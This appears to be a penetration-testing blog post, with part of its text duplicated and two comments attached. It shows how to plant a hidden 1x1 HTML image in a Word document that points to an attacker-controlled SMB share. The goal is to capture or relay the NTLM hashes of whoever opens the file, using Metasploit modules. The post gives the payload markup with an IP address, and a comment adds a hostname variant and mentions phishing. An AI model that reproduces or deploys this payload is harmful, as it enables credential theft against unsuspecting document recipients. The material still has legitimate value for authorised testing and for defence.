Someone asked me how to embed an HTML Link to an smb share into a word doc. End result would be to use the capture/server/smb or exploit/windows/exploit/smb/smb_relay modules. Easy right? Well it wasn't THAT easy...
In office 2010 when I'd go to pull in a picture to the document by adding a picture from a network share the picture would become part of the doc and not be retrieved every time the document opened. The solution was to add some html to the document.
I ended up addind the following code to the office document (replace "[" or "]" with "<" or ">":
Once that is done, save and open the document, if all is well you'll see the SMB requests to the network share you specified and if you are running the smb capture module you should see some traffic. Screenshot below shows the goods...I do realize the LM hashes are missing from smb capture screenie (disabled on windows 7?) but i was too lazy to install office on a VM just for the screenshot.
If this doesnt work for anyone let me know.
In office 2010 when I'd go to pull in a picture to the document by adding a picture from a network share the picture would become part of the doc and not be retrieved every time the document opened. The solution was to add some html to the document.
I ended up addind the following code to the office document (replace "[" or "]" with "<" or ">":
[html][body][img src="\\192.168.26.133\share\pwn.jpeg"
width=1 height=1][/body][html]
Once that is done go to insert-->object--text from file-->select your HTML fileOnce that is done, save and open the document, if all is well you'll see the SMB requests to the network share you specified and if you are running the smb capture module you should see some traffic. Screenshot below shows the goods...I do realize the LM hashes are missing from smb capture screenie (disabled on windows 7?) but i was too lazy to install office on a VM just for the screenshot.
If this doesnt work for anyone let me know.
2 comments:
I do believe negotiate NTLM if possible is the default setting for Windows 7.
Interesting post. Its another great way to gather phishing metrics or possible creds.
By referring to it as an IP address it won't auto authenticate. Otherwise, you could embed an Internet IP and it'd auth off of the local network.
Assuming rules aren't different for Outlook (I don't know why they would be, but its possible), you'd want to refer to your server by a netbios name or by a name within the domain.
[html][body][img src="\\pwned\share\pwn.jpeg"
width=1 height=1][/body][html]
Post a Comment